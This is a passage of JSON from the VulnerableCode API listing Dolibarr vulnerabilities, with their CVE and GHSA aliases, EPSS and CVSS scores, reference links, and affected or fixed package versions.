VCID-bthp-4km9-ekhz"},{"vulnerability":"VCID-cjmf-3m54-x3af"},{"vulnerability":"VCID-en1t-b8gx-6bgt"},{"vulnerability":"VCID-f3k5-kjua-mqes"},{"vulnerability":"VCID-h4pr-kj49-xfhb"},{"vulnerability":"VCID-k1fz-zvje-17ga"},{"vulnerability":"VCID-n6mk-74qs-6bfw"},{"vulnerability":"VCID-pn1n-de3e-uufv"},{"vulnerability":"VCID-qrcn-mrfx-xyb2"},{"vulnerability":"VCID-rjd3-a1ds-skdp"},{"vulnerability":"VCID-rtec-tutp-m3ep"},{"vulnerability":"VCID-spzz-de9a-g3gw"},{"vulnerability":"VCID-t393-s4zx-uyhs"},{"vulnerability":"VCID-tfxu-34ku-6uce"},{"vulnerability":"VCID-vxpt-gdg8-r7dc"},{"vulnerability":"VCID-wtcs-fcvg-dkgm"},{"vulnerability":"VCID-zwts-bt1w-p7a4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@14.0.0"}],"aliases":["CVE-2021-25954","GHSA-vxhc-c4qm-647p"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-kxze-6h5v-mqg4"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/337021?format=json","vulnerability_id":"VCID-mn75-tppb-dfd6","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2021-25956","reference_id":"","reference_type":"","scores":[{"value":"0.00372","scoring_system":"epss","scoring_elements":"0.59377","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2021-25956"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/c4cba43bade736ab89e31013a6ccee59a6e077ee","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/c4cba43bade736ab89e31013a6ccee59a6e077ee"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2021-25956","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2021-25956"},{"reference_url":"https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25956","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25956"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/391503?format=json","purl":"pkg:composer/dolibarr/dolibarr@13.0.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1qr4-xs72-e3a2"},{"vulnerability":"VCID-2fj8-fn7c-3ka1"},{"vulnerability":"VCID-3ny3-rj44-ffgf"},{"vulnerability":"VCID-44tq-zhx1-8beb"},{"vulnerability":"VCID-4cfp-8g13-k7bd"},{"vulnerability":"VCID-5ykc-55w1-3ka4"},{"vulnerability":"VCID-5ynu-3t27-kuhq"},{"vulnerability":"VCID-6mqr-g619-dqbu"},{"vulnerability":"VCID-76rs-x78m-1fg6"},{"vulnerability":"VCID-79w7-szqt-wfeq"},{"vulnerability":"VCID-7g1w-ar9a-r7fb"},{"vulnerability":"VCID-83c2-jnk3-mbau"},{"vulnerability":"VCID-9f3a-9c5y-juf1"},{"vulnerability":"VCID-aeaq-1k3n-y7h1"},{"vulnerability":"VCID-az9a-3z2g-9kht"},{"vulnerability":"VCID-azy5-es2r-yyex"},{"vulnerability":"VCID-bthp-4km9-ekhz"},{"vulnerability":"VCID-cjmf-3m54-x3af"},{"vulnerability":"VCID-en1t-b8gx-6bgt"},{"vulnerability":"VCID-f3k5-kjua-mqes"},{"vulnerability":"VCID-h4pr-kj49-xfhb"},{"vulnerability":"VCID-k1fz-zvje-17ga"},{"vulnerability":"VCID-kxze-6h5v-mqg4"},{"vulnerability":"VCID-n6mk-74qs-6bfw"},{"vulnerability":"VCID-pn1n-de3e-uufv"},{"vulnerability":"VCID-qrcn-mrfx-xyb2"},{"vulnerability":"VCID-rjd3-a1ds-skdp"},{"vulnerability":"VCID-rtec-tutp-m3ep"},{"vulnerability":"VCID-spzz-de9a-g3gw"},{"vulnerability":"VCID-t393-s4zx-uyhs"},{"vulnerability":"VCID-tfxu-34ku-6uce"},{"vulnerability":"VCID-vxpt-gdg8-r7dc"},{"vulnerability":"VCID-wtcs-fcvg-dkgm"},{"vulnerability":"VCID-zwts-bt1w-p7a4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@13.0.3"},{"url":"http://public2.vulnerablecode.io/api/packages/19977?format=json","purl":"pkg:composer/dolibarr/dolibarr@14.0.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1qr4-xs72-e3a2"},{"vulnerability":"VCID-2fj8-fn7c-3ka1"},{"vulnerability":"VCID-3ny3-rj44-ffgf"},{"vulnerability":"VCID-44tq-zhx1-8beb"},{"vulnerability":"VCID-4cfp-8g13-k7bd"},{"vulnerability":"VCID-5ykc-55w1-3ka4"},{"vulnerability":"VCID-5ynu-3t27-kuhq"},{"vulnerability":"VCID-6mqr-g619-dqbu"},{"vulnerability":"VCID-76rs-x78m-1fg6"},{"vulnerability":"VCID-79w7-szqt-wfeq"},{"vulnerability":"VCID-7g1w-ar9a-r7fb"},{"vulnerability":"VCID-83c2-jnk3-mbau"},{"vulnerability":"VCID-9f3a-9c5y-juf1"},{"vulnerability":"VCID-aeaq-1k3n-y7h1"},{"vulnerability":"VCID-az9a-3z2g-9kht"},{"vulnerability":"VCID-azy5-es2r-yyex"},{"vulnerability":"VCID-bthp-4km9-ekhz"},{"vulnerability":"VCID-cjmf-3m54-x3af"},{"vulnerability":"VCID-en1t-b8gx-6bgt"},{"vulnerability":"VCID-f3k5-kjua-mqes"},{"vulnerability":"VCID-h4pr-kj49-xfhb"},{"vulnerability":"VCID-k1fz-zvje-17ga"},{"vulnerability":"VCID-n6mk-74qs-6bfw"},{"vulnerability":"VCID-pn1n-de3e-uufv"},{"vulnerability":"VCID-qrcn-mrfx-xyb2"},{"vulnerability":"VCID-rjd3-a1ds-skdp"},{"vulnerability":"VCID-rtec-tutp-m3ep"},{"vulnerability":"VCID-spzz-de9a-g3gw"},{"vulnerability":"VCID-t393-s4zx-uyhs"},{"vulnerability":"VCID-tfxu-34ku-6uce"},{"vulnerability":"VCID-vxpt-gdg8-r7dc"},{"vulnerability":"VCID-wtcs-fcvg-dkgm"},{"vulnerability":"VCID-zwts-bt1w-p7a4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@14.0.0"}],"aliases":["CVE-2021-25956","GHSA-fjqg-w8g6-hhq8"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-mn75-tppb-dfd6"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/207652?format=json","vulnerability_id":"VCID-n6mk-74qs-6bfw","summary":"Dolibarr vulnerable to Improper Validation of Specified Quantity in Input","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-0414","reference_id":"","reference_type":"","scores":[{"value":"0.00326","scoring_system":"epss","scoring_elements":"0.55989","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-0414"},{"reference_url":"https://github.com/dolibarr/dolibarr","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/dolibarr/dolibarr"},{"reference_url":"https://github.com/dolibarr/dolibarr/commit/37fb02ee760cfff18c795ba468da1ba1c53f4684","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/dolibarr/dolibarr/commit/37fb02ee760cfff18c795ba468da1ba1c53f4684"},{"reference_url":"https://huntr.dev/bounties/76f3b405-9f5d-44b1-8434-b52b56ee395f","reference_id":"","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://huntr.dev/bounties/76f3b405-9f5d-44b1-8434-b52b56ee395f"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-0414","reference_id":"CVE-2022-0414","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-0414"},{"reference_url":"https://github.com/advisories/GHSA-f768-8pvq-mm6r","reference_id":"GHSA-f768-8pvq-mm6r","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-f768-8pvq-mm6r"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/18669?format=json","purl":"pkg:composer/dolibarr/dolibarr@15.0.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1qr4-xs72-e3a2"},{"vulnerability":"VCID-3ny3-rj44-ffgf"},{"vulnerability":"VCID-44tq-zhx1-8beb"},{"vulnerability":"VCID-4cfp-8g13-k7bd"},{"vulnerability":"VCID-5ykc-55w1-3ka4"},{"vulnerability":"VCID-5ynu-3t27-kuhq"},{"vulnerability":"VCID-6mqr-g619-dqbu"},{"vulnerability":"VCID-76rs-x78m-1fg6"},{"vulnerability":"VCID-79w7-szqt-wfeq"},{"vulnerability":"VCID-7g1w-ar9a-r7fb"},{"vulnerability":"VCID-9f3a-9c5y-juf1"},{"vulnerability":"VCID-aeaq-1k3n-y7h1"},{"vulnerability":"VCID-az9a-3z2g-9kht"},{"vulnerability":"VCID-azy5-es2r-yyex"},{"vulnerability":"VCID-bthp-4km9-ekhz"},{"vulnerability":"VCID-cjmf-3m54-x3af"},{"vulnerability":"VCID-en1t-b8gx-6bgt"},{"vulnerability":"VCID-f3k5-kjua-mqes"},{"vulnerability":"VCID-h4pr-kj49-xfhb"},{"vulnerability":"VCID-pn1n-de3e-uufv"},{"vulnerability":"VCID-qrcn-mrfx-xyb2"},{"vulnerability":"VCID-rjd3-a1ds-skdp"},{"vulnerability":"VCID-rtec-tutp-m3ep"},{"vulnerability":"VCID-spzz-de9a-g3gw"},{"vulnerability":"VCID-tfxu-34ku-6uce"},{"vulnerability":"VCID-wtcs-fcvg-dkgm"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@15.0.0"},{"url":"http://public2.vulnerablecode.io/api/packages/19494?format=json","purl":"pkg:composer/dolibarr/dolibarr@16.0.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-bjem-6exd-9kf2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@16.0.0"}],"aliases":["CVE-2022-0414","GHSA-f768-8pvq-mm6r"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-n6mk-74qs-6bfw"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/309933?format=json","vulnerability_id":"VCID-nn71-z52s-u7g9","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2019-11200","reference_id":"","reference_type":"","scores":[{"value":"0.0116","scoring_system":"epss","scoring_elements":"0.79005","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2019-11200"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/01075081cbcd9130a72115cdb50ee61fc394edc1","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/01075081cbcd9130a72115cdb50ee61fc394edc1"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/d6ae62478c8841fdfe58971494818b599f396d4f","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/d6ae62478c8841fdfe58971494818b599f396d4f"},{"reference_url":"https://github.com/Dolibarr/dolibarr/issues/10984#issuecomment-488297419","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/issues/10984#issuecomment-488297419"},{"reference_url":"https://know.bishopfox.com/advisories/dolibarr-version-9-0-1-vulnerabilities","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://know.bishopfox.com/advisories/dolibarr-version-9-0-1-vulnerabilities"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2019-11200","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2019-11200"},{"reference_url":"https://github.com/advisories/GHSA-2rwh-262r-r85j","reference_id":"GHSA-2rwh-262r-r85j","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-2rwh-262r-r85j"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/455558?format=json","purl":"pkg:composer/dolibarr/dolibarr@9.0.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1qr4-xs72-e3a2"},{"vulnerability":"VCID-2fj8-fn7c-3ka1"},{"vulnerability":"VCID-2fk1-fu91-kfh1"},{"vulnerability":"VCID-3ny3-rj44-ffgf"},{"vulnerability":"VCID-44tq-zhx1-8beb"},{"vulnerability":"VCID-4cfp-8g13-k7bd"},{"vulnerability":"VCID-54b5-vj66-ayeu"},{"vulnerability":"VCID-5ykc-55w1-3ka4"},{"vulnerability":"VCID-5ynu-3t27-kuhq"},{"vulnerability":"VCID-6mqr-g619-dqbu"},{"vulnerability":"VCID-76rs-x78m-1fg6"},{"vulnerability":"VCID-79w7-szqt-wfeq"},{"vulnerability":"VCID-7g1w-ar9a-r7fb"},{"vulnerability":"VCID-83c2-jnk3-mbau"},{"vulnerability":"VCID-9f3a-9c5y-juf1"},{"vulnerability":"VCID-aeaq-1k3n-y7h1"},{"vulnerability":"VCID-az9a-3z2g-9kht"},{"vulnerability":"VCID-azy5-es2r-yyex"},{"vulnerability":"VCID-bthp-4km9-ekhz"},{"vulnerability":"VCID-cjmf-3m54-x3af"},{"vulnerability":"VCID-en1t-b8gx-6bgt"},{"vulnerability":"VCID-f3k5-kjua-mqes"},{"vulnerability":"VCID-f96a-99zf-kfcf"},{"vulnerability":"VCID-fyuf-7bvy-b3am"},{"vulnerability":"VCID-gk4m-a13r-ekd6"},{"vulnerability":"VCID-h4pr-kj49-xfhb"},{"vulnerability":"VCID-k1fz-zvje-17ga"},{"vulnerability":"VCID-kxze-6h5v-mqg4"},{"vulnerability":"VCID-mn75-tppb-dfd6"},{"vulnerability":"VCID-n6mk-74qs-6bfw"},{"vulnerability":"VCID-p7h1-ceff-pfhu"},{"vulnerability":"VCID-pn1n-de3e-uufv"},{"vulnerability":"VCID-qrcn-mrfx-xyb2"},{"vulnerability":"VCID-rjd3-a1ds-skdp"},{"vulnerability":"VCID-rtec-tutp-m3ep"},{"vulnerability":"VCID-snwr-xzcb-rfdr"},{"vulnerability":"VCID-spzz-de9a-g3gw"},{"vulnerability":"VCID-szp5-96ea-jua5"},{"vulnerability":"VCID-t393-s4zx-uyhs"},{"vulnerability":"VCID-tfxu-34ku-6uce"},{"vulnerability":"VCID-vxpt-gdg8-r7dc"},{"vulnerability":"VCID-wtcs-fcvg-dkgm"},{"vulnerability":"VCID-ww61-hqb4-m3db"},{"vulnerability":"VCID-x7qz-jffh-9ydk"},{"vulnerability":"VCID-y2yy-zrhp-rba3"},{"vulnerability":"VCID-zwts-bt1w-p7a4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@9.0.2"},{"url":"http://public2.vulnerablecode.io/api/packages/384742?format=json","purl":"pkg:composer/dolibarr/dolibarr@9.0.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1qr4-xs72-e3a2"},{"vulnerability":"VCID-2fj8-fn7c-3ka1"},{"vulnerability":"VCID-2fk1-fu91-kfh1"},{"vulnerability":"VCID-3ny3-rj44-ffgf"},{"vulnerability":"VCID-44tq-zhx1-8beb"},{"vulnerability":"VCID-4cfp-8g13-k7bd"},{"vulnerability":"VCID-54b5-vj66-ayeu"},{"vulnerability":"VCID-5ykc-55w1-3ka4"},{"vulnerability":"VCID-5ynu-3t27-kuhq"},{"vulnerability":"VCID-6mqr-g619-dqbu"},{"vulnerability":"VCID-76rs-x78m-1fg6"},{"vulnerability":"VCID-79w7-szqt-wfeq"},{"vulnerability":"VCID-7g1w-ar9a-r7fb"},{"vulnerability":"VCID-83c2-jnk3-mbau"},{"vulnerability":"VCID-9f3a-9c5y-juf1"},{"vulnerability":"VCID-aeaq-1k3n-y7h1"},{"vulnerability":"VCID-az9a-3z2g-9kht"},{"vulnerability":"VCID-azy5-es2r-yyex"},{"vulnerability":"VCID-bthp-4km9-ekhz"},{"vulnerability":"VCID-cjmf-3m54-x3af"},{"vulnerability":"VCID-en1t-b8gx-6bgt"},{"vulnerability":"VCID-f3k5-kjua-mqes"},{"vulnerability":"VCID-f96a-99zf-kfcf"},{"vulnerability":"VCID-fyuf-7bvy-b3am"},{"vulnerability":"VCID-gk4m-a13r-ekd6"},{"vulnerability":"VCID-h4pr-kj49-xfhb"},{"vulnerability":"VCID-k1fz-zvje-17ga"},{"vulnerability":"VCID-kxze-6h5v-mqg4"},{"vulnerability":"VCID-mn75-tppb-dfd6"},{"vulnerability":"VCID-n6mk-74qs-6bfw"},{"vulnerability":"VCID-p7h1-ceff-pfhu"},{"vulnerability":"VCID-pn1n-de3e-uufv"},{"vulnerability":"VCID-qrcn-mrfx-xyb2"},{"vulnerability":"VCID-rjd3-a1ds-skdp"},{"vulnerability":"VCID-rtec-tutp-m3ep"},{"vulnerability":"VCID-snwr-xzcb-rfdr"},{"vulnerability":"VCID-spzz-de9a-g3gw"},{"vulnerability":"VCID-szp5-96ea-jua5"},{"vulnerability":"VCID-t393-s4zx-uyhs"},{"vulnerability":"VCID-tfxu-34ku-6uce"},{"vulnerability":"VCID-vxpt-gdg8-r7dc"},{"vulnerability":"VCID-wtcs-fcvg-dkgm"},{"vulnerability":"VCID-ww61-hqb4-m3db"},{"vulnerability":"VCID-x7qz-jffh-9ydk"},{"vulnerability":"VCID-y2yy-zrhp-rba3"},{"vulnerability":"VCID-zwts-bt1w-p7a4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@9.0.3"}],"aliases":["CVE-2019-11200","GHSA-2rwh-262r-r85j"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-nn71-z52s-u7g9"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/322606?format=json","vulnerability_id":"VCID-p7h1-ceff-pfhu","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2020-14443","reference_id":"","reference_type":"","scores":[{"value":"0.00295","scoring_system":"epss","scoring_elements":"0.53213","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2020-14443"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/40e16672e3aa4e9208ea7a4829f30507dcdfc4ba","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/40e16672e3aa4e9208ea7a4829f30507dcdfc4ba"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2020-14443","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2020-14443"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/16507?format=json","purl":"pkg:composer/dolibarr/dolibarr@11.0.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1qr4-xs72-e3a2"},{"vulnerability":"VCID-2fj8-fn7c-3ka1"},{"vulnerability":"VCID-2fk1-fu91-kfh1"},{"vulnerability":"VCID-3ny3-rj44-ffgf"},{"vulnerability":"VCID-44tq-zhx1-8beb"},{"vulnerability":"VCID-4cfp-8g13-k7bd"},{"vulnerability":"VCID-54b5-vj66-ayeu"},{"vulnerability":"VCID-5ykc-55w1-3ka4"},{"vulnerability":"VCID-5ynu-3t27-kuhq"},{"vulnerability":"VCID-6mqr-g619-dqbu"},{"vulnerability":"VCID-76rs-x78m-1fg6"},{"vulnerability":"VCID-79r7-e5j6-43fz"},{"vulnerability":"VCID-79w7-szqt-wfeq"},{"vulnerability":"VCID-7g1w-ar9a-r7fb"},{"vulnerability":"VCID-83c2-jnk3-mbau"},{"vulnerability":"VCID-9f3a-9c5y-juf1"},{"vulnerability":"VCID-aeaq-1k3n-y7h1"},{"vulnerability":"VCID-az9a-3z2g-9kht"},{"vulnerability":"VCID-azy5-es2r-yyex"},{"vulnerability":"VCID-bthp-4km9-ekhz"},{"vulnerability":"VCID-cjmf-3m54-x3af"},{"vulnerability":"VCID-en1t-b8gx-6bgt"},{"vulnerability":"VCID-f3k5-kjua-mqes"},{"vulnerability":"VCID-h4pr-kj49-xfhb"},{"vulnerability":"VCID-jb1j-bjyk-gqcc"},{"vulnerability":"VCID-k1fz-zvje-17ga"},{"vulnerability":"VCID-kxze-6h5v-mqg4"},{"vulnerability":"VCID-mn75-tppb-dfd6"},{"vulnerability":"VCID-n6mk-74qs-6bfw"},{"vulnerability":"VCID-np78-43e1-1yc5"},{"vulnerability":"VCID-pn1n-de3e-uufv"},{"vulnerability":"VCID-qrcn-mrfx-xyb2"},{"vulnerability":"VCID-rjd3-a1ds-skdp"},{"vulnerability":"VCID-rtec-tutp-m3ep"},{"vulnerability":"VCID-snwr-xzcb-rfdr"},{"vulnerability":"VCID-spzz-de9a-g3gw"},{"vulnerability":"VCID-t393-s4zx-uyhs"},{"vulnerability":"VCID-tfxu-34ku-6uce"},{"vulnerability":"VCID-vxpt-gdg8-r7dc"},{"vulnerability":"VCID-wtcs-fcvg-dkgm"},{"vulnerability":"VCID-ww61-hqb4-m3db"},{"vulnerability":"VCID-zwts-bt1w-p7a4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@11.0.4"},{"url":"http://public2.vulnerablecode.io/api/packages/384545?format=json","purl":"pkg:composer/dolibarr/dolibarr@11.0.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1qr4-xs72-e3a2"},{"vulnerability":"VCID-2fj8-fn7c-3ka1"},{"vulnerability":"VCID-3ny3-rj44-ffgf"},{"vulnerability":"VCID-44tq-zhx1-8beb"},{"vulnerability":"VCID-4cfp-8g13-k7bd"},{"vulnerability":"VCID-5ykc-55w1-3ka4"},{"vulnerability":"VCID-5ynu-3t27-kuhq"},{"vulnerability":"VCID-6mqr-g619-dqbu"},{"vulnerability":"VCID-76rs-x78m-1fg6"},{"vulnerability":"VCID-79w7-szqt-wfeq"},{"vulnerability":"VCID-7g1w-ar9a-r7fb"},{"vulnerability":"VCID-83c2-jnk3-mbau"},{"vulnerability":"VCID-9f3a-9c5y-juf1"},{"vulnerability":"VCID-aeaq-1k3n-y7h1"},{"vulnerability":"VCID-az9a-3z2g-9kht"},{"vulnerability":"VCID-azy5-es2r-yyex"},{"vulnerability":"VCID-bthp-4km9-ekhz"},{"vulnerability":"VCID-cjmf-3m54-x3af"},{"vulnerability":"VCID-en1t-b8gx-6bgt"},{"vulnerability":"VCID-f3k5-kjua-mqes"},{"vulnerability":"VCID-h4pr-kj49-xfhb"},{"vulnerability":"VCID-k1fz-zvje-17ga"},{"vulnerability":"VCID-kxze-6h5v-mqg4"},{"vulnerability":"VCID-mn75-tppb-dfd6"},{"vulnerability":"VCID-n6mk-74qs-6bfw"},{"vulnerability":"VCID-pn1n-de3e-uufv"},{"vulnerability":"VCID-qrcn-mrfx-xyb2"},{"vulnerability":"VCID-rjd3-a1ds-skdp"},{"vulnerability":"VCID-rtec-tutp-m3ep"},{"vulnerability":"VCID-snwr-xzcb-rfdr"},{"vulnerability":"VCID-spzz-de9a-g3gw"},{"vulnerability":"VCID-t393-s4zx-uyhs"},{"vulnerability":"VCID-tfxu-34ku-6uce"},{"vulnerability":"VCID-vxpt-gdg8-r7dc"},{"vulnerability":"VCID-wtcs-fcvg-dkgm"},{"vulnerability":"VCID-ww61-hqb4-m3db"},{"vulnerability":"VCID-zwts-bt1w-p7a4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@11.0.5"}],"aliases":["CVE-2020-14443","GHSA-8v7v-6mmm-xjxm"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-p7h1-ceff-pfhu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/139849?format=json","vulnerability_id":"VCID-pn1n-de3e-uufv","summary":"Improper input validation in Dolibarr ERP CRM <= v18.0.1 fails to strip certain PHP code from user-supplied input when creating a Website, allowing an attacker to inject and evaluate arbitrary PHP code.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-4197","reference_id":"","reference_type":"","scores":[{"value":"0.53316","scoring_system":"epss","scoring_elements":"0.98036","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-4197"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-4197","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-4197"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/0ed6a63fb06be88be5a4f8bcdee83185eee4087e","reference_id":"0ed6a63fb06be88be5a4f8bcdee83185eee4087e","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-09-05T19:57:10Z/"}],"url":"https://github.com/Dolibarr/dolibarr/commit/0ed6a63fb06be88be5a4f8bcdee83185eee4087e"},{"reference_url":"https://starlabs.sg/advisories/23/23-4197","reference_id":"23-4197","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-09-05T19:57:10Z/"}],"url":"https://starlabs.sg/advisories/23/23-4197"},{"reference_url":"https://github.com/advisories/GHSA-r9cm-pw9j-3fpx","reference_id":"GHSA-r9cm-pw9j-3fpx","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-r9cm-pw9j-3fpx"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/381255?format=json","pur